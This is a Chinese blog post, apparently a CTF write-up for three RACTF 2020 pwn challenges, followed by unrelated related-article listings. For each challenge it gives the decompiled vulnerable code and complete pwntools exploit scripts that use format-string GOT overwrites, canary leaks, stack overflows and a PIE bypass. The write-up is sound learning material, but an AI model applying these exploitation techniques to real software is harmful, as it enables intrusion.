RACTF Writeup pwn

原創 SkYe231 2020-07-02 18:16

大不列颠的 Rating 0 赛,还是持续 4 天的

Not Really AI

分析

保护情况

全关

漏洞函数

简单格式化字符串

int response()
{
  char s; // [esp+0h] [ebp-208h]

  puts("How are you finding RACTF?");
  fgets(&s, 0x200, stdin);
  puts("I am glad you");
  printf(&s);
  return puts("\nWe hope you keep going!");
}

思路

有预留后门,直接找个跳转的地方改了就行,改了 puts plt 表。

exp

from pwn import *

context.log_level = 'debug'
#p = process("./nra")
p = remote("95.216.233.106",40592)

payload = '%69c%15$hhn%77c%16$hhn%114c%17$hhn%4c%18$hhn'+ p32(0x804c018)+p32(0x804c018+1)+p32(0x804c018+2)+p32(0x804c018+3)
p.recvuntil("RACTF?\n")
p.sendline(payload)

p.interactive()

Finches in a Stack

分析

保护情况

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

漏洞函数

两处栈溢出加上一个格式化字符串。

unsigned int say_hi()
{
  char *v0; // eax
  char v2; // [esp+3h] [ebp-25h]
  char s[20]; // [esp+8h] [ebp-20h]
  unsigned int v4; // [esp+1Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  printf("Hi! What's your name? ");
  gets(s);                                      // 栈溢出
  printf("Nice to meet you, ");
  v0 = &s[strlen(s)];
  *(_WORD *)v0 = '\n!';                         
  v0[2] = 0;                                    
  printf(s);                                    // 格式化字符串
  puts("Do YOU want to pet my canary?");
  gets(&v2);
  return __readgsdword(0x14u) ^ v4;
}

思路

有预留的后门函数,再有一个长度足够的栈溢出,有可能控制 eip 跳转到后门。程序开了 canary 那肯定要绕过,刚好有格式化字符串可以泄露 canary 值。调试一下得到偏移为: 11

# 泄露 canary
payload = 'aaaa' + "%11$p"

栈溢出控制跳转:

payload = 'b'*25 + p32(canary) + p32(flag)*4

exp

from pwn import *

context.log_level = 'debug'

#p = process("./fias")
p = remote("95.216.233.106",45107)
elf = ELF("./fias")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")

flag = 0x80491D2

payload = 'aaaa' + "%11$p"
p.recvuntil("name?")
p.sendline(payload)
p.recvuntil('aaaa')
canary = int(p.recvuntil('!',drop=True),16)
log.info("canary:"+hex(canary))

payload = 'b'*25 + p32(canary) + p32(flag)*4
p.recvuntil("canary?\n")
#gdb.attach(p)
p.sendline(payload)

p.interactive()

Finches in a Pie

分析

保护情况

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

漏洞函数

和上一题一样的栈溢出和格式化字符串,区别是这题开了 PIE。

unsigned int say_hi()
{
  char *v0; // eax
  char v2; // [esp+3h] [ebp-25h]
  char s[20]; // [esp+8h] [ebp-20h]
  unsigned int v4; // [esp+1Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  puts("CATCH HIM!\n");
  puts("You got him! Thank you!");
  puts("What's your name?");
  gets(s);                                      // 栈溢出
  printf("Thank you, ");
  v0 = &s[strlen(s)];
  *(_WORD *)v0 = '\n!';
  v0[2] = 0;
  printf(s);                                    // 格式化字符串
  puts("Would you like some cake?");
  gets(&v2);                                    // 栈溢出
  return __readgsdword(0x14u) ^ v4;
}

思路

和上题区别是开了 PIE ,不能直接得到后门地址,需要绕过 PIE 保护。一开始想着 partial write ,没有找到有能跳转的地方。后面改用泄露地址,计算出真实地址,从而绕过 PIE 。

用格式化字符串可以泄露出 text 段和 libc 的地址。实际测试泄露 libc 地址调用 onegadget 无效,最后还是乖乖泄露 text 段地址,调用预留后门。

'''
11 : canary 偏移
15 :0x13D9 对应的text实际地址(在main中)
'''
payload = 'aaaa' + "%11$p" + "|" + "%15$p" + "|"

然后就是和上一题一样操作。

payload = 'b'*25 + p32(canary) + 'b'*0xc + p32(flag)

exp

泄露 text 段

from pwn import *

context.log_level = 'debug'

p = process("./fiap")
#p = remote("95.216.233.106",45459)
elf = ELF("./fiap")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")

payload = 'aaaa' + "%11$p" + "|" + "%15$p" + "|"
p.recvuntil("name?\n")
gdb.attach(p)
p.sendline(payload)
p.recvuntil('aaaa')
canary = int(p.recvuntil('|',drop=True),16)
log.info("canary:"+hex(canary))
text_leak = int(p.recvuntil('|',drop=True),16)
log.info("text_leak:"+hex(text_leak))
flag = text_leak - 0x1d0
log.info("flag:"+hex(flag))


payload = 'b'*25 + p32(canary) + 'b'*0xc + p32(flag)
p.recvuntil("cake?\n")

p.sendline(payload)

p.interactive()

泄露 libc (仅本地可用)

from pwn import *

context.log_level = 'debug'

p = process("./fiap")
#p = remote("95.216.233.106",45459)
elf = ELF("./fiap")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")

one_gadget = 0x5fbc5

payload = 'aaaa' + "%11$p" + "|" + "%23$p" + "|"
p.recvuntil("name?\n")
gdb.attach(p)
p.sendline(payload)
p.recvuntil('aaaa')
canary = int(p.recvuntil('|',drop=True),16)
log.info("canary:"+hex(canary))
libc_leak = int(p.recvuntil('|',drop=True),16)
log.info("libc_leak:"+hex(libc_leak))
libc_base = libc_leak - 99895
log.info("libc_base:"+hex(libc_base))
system = libc_base + libc.symbols['system']
log.info("system:"+hex(system))
one_gadget += libc_base
log.info("one_gadget:"+hex(one_gadget))

payload = 'b'*25 + p32(canary) + 'b'*0xc + p32(one_gadget)
#payload = 'bbbbb'
p.recvuntil("cake?\n")

p.sendline(payload)

p.interactive()

PIE 绕过

PIE保护详解和常用bypass手段

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Postman 拷贝 curl 不识别 --data-raw

postman:請求路徑:       拷貝出來的curl: curl --location --request POST 'http://xxxxxxxxxxxxx/xxx/xxx' \ --header 'Content-Type:

亮sir 2024-06-06 14:26:55

985 硕士程序员,空窗 4 个月没有 Offer!

大家好,我是R哥。 最近,R哥分享了幾個特別有意思的面試輔導成功案例: 35K*14 薪入職了,這公司只要不裁員,我能一直呆下去。。 幹了 2 年多 Java 外包,終於脫離了! 輔導一週,連拿 3 個 Offer! 說到

Java技術棧 2024-06-06 14:24:35

(数据科学学习手札161)高性能数据分析利器DuckDB在Python中的使用

本文完整代碼及附件已上傳至我的Github倉庫https://github.com/CNFeffery/DataScienceStudyNotes 1 簡介   大家好我是費老師,就在幾天前,經過六年多的持續開發迭代,著名的開源高性能分

費弗裏 2024-06-06 14:24:35

WindowsServer--SQL Server搭建主从同步实现读写分离 - 事务性分发

十年河東,十年河西,莫欺少年窮 學無止境,精益求精 先決條件 主服務器也稱之爲分發服務器,從服務器稱之爲訂閱服務器 下文皆按照主/從服務器稱呼 主服務器和訂閱服務器需在同一個內網網絡內 主服務器和訂閱服務器安裝相同版本sqlserver,本

天才臥龍 2024-06-06 14:24:25

终于搞懂了!原来vue3中template使用ref无需.value是因为这个

前言 衆所周知,vue3的template中使用ref變量無需使用.value。還可以在事件處理器中進行賦值操作時,無需使用.value就可以直接修改ref變量的值,比如:<button @click="msg = 'Hello Vue3'

你假裝沒察覺 2024-06-06 14:24:14

调试chatglm4代码

import torch from transformers import AutoModelForCausalLM, AutoTokenizer from modeling_chatglm import ChatGLMForConditi

張博的博客 2024-06-06 14:22:54

记一次 .NET某工控视觉自动化系统 卡死分析

一:背景 1. 講故事 今天分享的dump是訓練營裏一位學員的,從一個啥也不會到現在分析的有模有樣,真的是看他成長起來的,調試技術學會了就是真真實實自己的,話不多說,上windbg說話。 二:WinDbg 分析 1. 爲什麼會卡死 這位學員

一線碼農 2024-06-06 14:18:44

k8s组件和网络插件挂掉,演示已有的pod是否正常运行

  環境 03 master ,05 06是node [root@mcwk8s03 mcwtest]# kubectl get nodes -o wide NAME STATUS ROLES AGE VERSI

馬昌偉 2024-06-06 14:16:54

创建一条隧道网络,进行传输的时候,是否是转换为物理网卡IP进行通信? k8s组件和网络插件挂掉,演示已有的pod是否正常运行

由此產生的疑問: k8s組件和網絡插件掛掉,演示已有的pod是否正常運行       【1】創建一條隧道網絡,進行傳輸的時候,是否是轉換爲物理網卡IP進行通信?   在創建隧道網絡進行傳輸時,通常不會直接轉換爲物理網卡IP進行通信。

馬昌偉 2024-06-06 14:16:54

aecmap直接用地理座标系计算面积

aecgis直接用地理座標系計算面積 1.添加字段,選擇雙精度 2.打開字段計算器,選擇python 3.輸入: !Shape.geodesicArea!/1000000  4.計算           @ouyang 翻譯 搜索

莫小龍 2024-06-06 14:16:34

java由于越界导致的报错

問題 兩種計算時間戳的結果不一樣。 int days = 30; Instant now = Instant.now(); long timestamp_cur = now.toEpochMilli(); long nowPre = ti

jihite 2024-06-06 14:11:03

webDav网盘

今天又學習到了,優點是直接用IIS或nginx等發佈,使用80或443端口。   Windows Server 安裝 WebDAV (步驟超詳細) - 鄭道傑 - 博客園 (cnblogs.com) 全網最詳細 WebDAV 搭建文檔(Wi

81 2024-06-06 14:09:13

NFS,smb和数据库文件

nfs的搭建網上有很多,可自行查看 Windows Server2012 R2搭建NFS服務器 - 知乎 (zhihu.com) 其中Windows10家庭版不支持NFS客戶端,目前Windows上的協議是V3版本,防火牆上有NFS的選項,

81 2024-06-06 14:09:13

赛博斗地主——使用大语言模型扮演Agent智能体玩牌类游戏。

通過大模型來實現多個智能體進行遊戲對局這個想對已經比較成熟了無論是去年驚豔的斯坦福小鎮還是比如metaGPT或者類似的框架都是使用智能體技術讓大模型來操控,從而讓大模型跳出自身“預測下一個token”的文字功能去探索更多的應用落地可能性。不

a1010 2024-06-06 14:08:23

python内置函数——sorted

對List、Dict進行排序,Python提供了兩個方法 對給定的List L進行排序, 方法1.用List的成員函數sort進行排序,在本地進行排序,不返回副本 方法2.用built-in函數sorted進行排序(從2.4開始),返回副本

python學習者0 2024-06-06 14:07:53